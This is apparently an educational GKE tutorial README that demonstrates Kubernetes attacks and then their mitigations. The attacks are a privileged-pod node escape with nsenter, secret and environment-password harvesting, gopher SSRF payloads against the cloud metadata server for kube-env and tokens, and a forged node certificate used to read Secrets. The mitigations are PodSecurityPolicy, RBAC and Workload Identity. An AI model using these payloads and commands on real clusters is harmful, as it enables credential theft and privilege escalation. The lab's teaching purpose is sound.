- This repository contains the tutorial "Kubernetes Security for Microservices".
- Caution
- This repository is intended for education.
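# Target project for every gcloud call below; replace the placeholder before running.
PROJECT_ID="Your Project Name"
# Quoted so the value reaches gcloud as a single argument (the placeholder contains spaces).
gcloud config set project "$PROJECT_ID"
gcloud services enable container.googleapis.com
# --async returns immediately: the cluster is not usable until provisioning has finished.
# --enable-pod-security-policy turns on PodSecurityPolicy admission, used by the manifest/psp/ step later in the tutorial.
gcloud beta container clusters create gke-security-testing --zone us-central1-a --machine-type n1-standard-1 --num-nodes 3 --enable-pod-security-policy --async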
- You can check the status in the console.
# Fetch kubeconfig credentials for the new cluster (wait for the --async creation above to finish first).
gcloud container clusters get-credentials gke-security-testing --zone=us-central1-a
# Sanity check that the nodes are registered.
kubectl get node
# Deploy the intentionally vulnerable SSRF demo server; it is reached only through port-forward later (see the note below).
kubectl apply -f manifest/ssrf_server/ -R
- Please do not expose the deployment to the Internet through a Service.
# Demonstrates the impact of an unrestricted (root / host-namespace) pod.
# manifest/root/pod.yaml is the same pod that the PodSecurityPolicy step (manifest/psp/) is meant to reject later.
kubectl apply -f manifest/root/pod.yaml
# Enter the node's mount namespace from inside the pod; from here on, commands run with the node's filesystem view.
kubectl exec -it root-container -- /bin/sh -c "nsenter --mount=/proc/1/ns/mnt -- /bin/bash"
# Typed inside the nsenter shell: the kubelet's own kubeconfig on the node is used to read a Secret.
# This is the evidence for why such pods must be blocked by admission policy.
kubectl --kubeconfig /var/lib/kubelet/kubeconfig get secret dummy-secret -o yaml
Get credentials (method 2) (please copy this command from GitHub)
# Still inside the nsenter shell on the node: list the environment of every container via the node's Docker daemon.
# Shows why secrets passed as environment variables are readable by anyone with node access.
docker ps -q | xargs docker inspect --format='{{range .Config.Env}}{{println .}}{{end}}' | grep DB_Password
# Leave the node shell and return to the local terminal.
exit
- RBAC
- PodSecurityPolicy
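# Shorthand for running kubectl while impersonating the unprivileged ServiceAccount.
# A function instead of an alias: aliases are not expanded when these lines are run from a script,
# while a function works both interactively and in a script.
kubectl-user() { kubectl --as=system:serviceaccount:default:unprivileged-user "$@"; }
# Remove the privileged pod from the previous step and the default-psp RoleBinding, then apply the restrictive policy.
kubectl delete pod root-container
kubectl delete rolebinding default-psp
kubectl apply -f manifest/psp/ -R
# Should be rejected now that the PodSecurityPolicy is in place.
kubectl-user apply -f manifest/root/pod.yaml
# Should be forbidden by RBAC: the unprivileged account has no access to kube-system.
kubectl-user get pod -n kube-system
# Forward the SSRF demo server to the local machine only (kubectl binds port-forward to localhost by default),
# so it is never exposed to the Internet. The original "2>&1 >/dev/null" sent stderr to the terminal and
# stdout to /dev/null, which is exactly what ">/dev/null" does; written plainly so errors stay visible
# while the forwarding chatter is hidden.
kubectl port-forward deployment/ssrf-server 8080:8080 >/dev/null &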
https://www.example.com
gopher://169.254.169.254:80/_GET /computeMetadata/v1/instance/attributes/kube-env?alt=json HTTP/1.1%0d%0aMetadata-Flavor: Google%0d%0aConnection: Close%0d%0a%0d%0a
The response contains "KUBELET_KEY".
# Working directory for the metadata helper scripts (extract.sh, make_cert.sh).
cd metadata-script
# Same request as the gopher payload above, sent through the port-forwarded SSRF server; the response is saved for extract.sh.
# This is the exposure that the Workload Identity / GKE metadata server change at the end of the tutorial is meant to close.
curl -X POST 'http://localhost:8080/get_contents' --data 'url=gopher%3A%2F%2F169.254.169.254%3A80%2F_GET+%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fkube-env%3Falt%3Djson+HTTP%2F1.1%250d%250aMetadata-Flavor%3A+Google%250d%250aConnection%3A+Close%250d%250a%250d%250a' -o metadata.txt
# Park the real kubeconfig so the following kubectl calls cannot fall back to it (restored later).
mv ~/.kube/config ~/.kube/config.tmp
# Should now show no contexts.
kubectl config get-contexts
- Extract the necessary data from the metadata
# Parse metadata.txt into the metadata/ directory (nodename, ca.crt and api_ip are consumed by the steps below).
bash extract.sh
ls -l metadata
- Send a CSR and get the node certificate
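# Submit a CSR for the node name recovered from the metadata; expected to produce newcert/node.crt and newcert/new.key,
# which the next step uses. Quoted so the node name is always passed as a single argument.
bash make_cert.sh "$(cat metadata/nodename)"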
- Set environment variables
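# Options that make kubectl authenticate with the node certificate instead of any kubeconfig.
# Kept as a single space-separated string because the commands below expand it unquoted on purpose;
# newcert/new.key is a private key and should be treated as a credential.
# The echo is only run if the assignment (and the cat inside it) succeeded; quoted so the value prints unaltered.
KUBE_OPT="--client-certificate newcert/node.crt --client-key newcert/new.key --certificate-authority metadata/ca.crt --server https://$(cat metadata/api_ip)" && printf '%s\n' "$KUBE_OPT"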
- Get secretName
# KUBE_OPT is intentionally unquoted: it is a space-separated list of options, not one argument.
# shellcheck disable=SC2086
kubectl $KUBE_OPT describe pod | grep secret
- Get the secret
# Reads the Secret using only the node certificate: this is the impact of the leaked kube-env.
# shellcheck disable=SC2086
kubectl $KUBE_OPT get secret dummy-secret -o yaml
# Restore the kubeconfig parked earlier.
mv ~/.kube/config.tmp ~/.kube/config
kubectl config get-contexts
gopher://169.254.169.254:80/_GET /computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1%0d%0aMetadata-Flavor: Google%0d%0aConnection: Close%0d%0a%0d%0a
- Enable Workload Identity (this takes a long time)
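# Mitigation for the metadata exposure shown above: Workload Identity and the GKE metadata server.
# The cluster was created zonal (--zone us-central1-a); the original "--region us-central1-a" does not match
# how the cluster was created, so --zone is used here consistently with the other commands.
gcloud beta container clusters update gke-security-testing --identity-namespace="${PROJECT_ID}.svc.id.goog" --zone us-central1-a
# Switch the node pool to the GKE metadata server, intended to stop pods from reading the node's kube-env
# and service-account token from the instance metadata.
gcloud beta container node-pools update default-pool --cluster=gke-security-testing --workload-metadata-from-node=GKE_METADATA_SERVER --zone us-central1-a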
# Tear down the cluster; --async returns before the deletion completes.
gcloud container clusters delete gke-security-testing --zone us-central1-a --async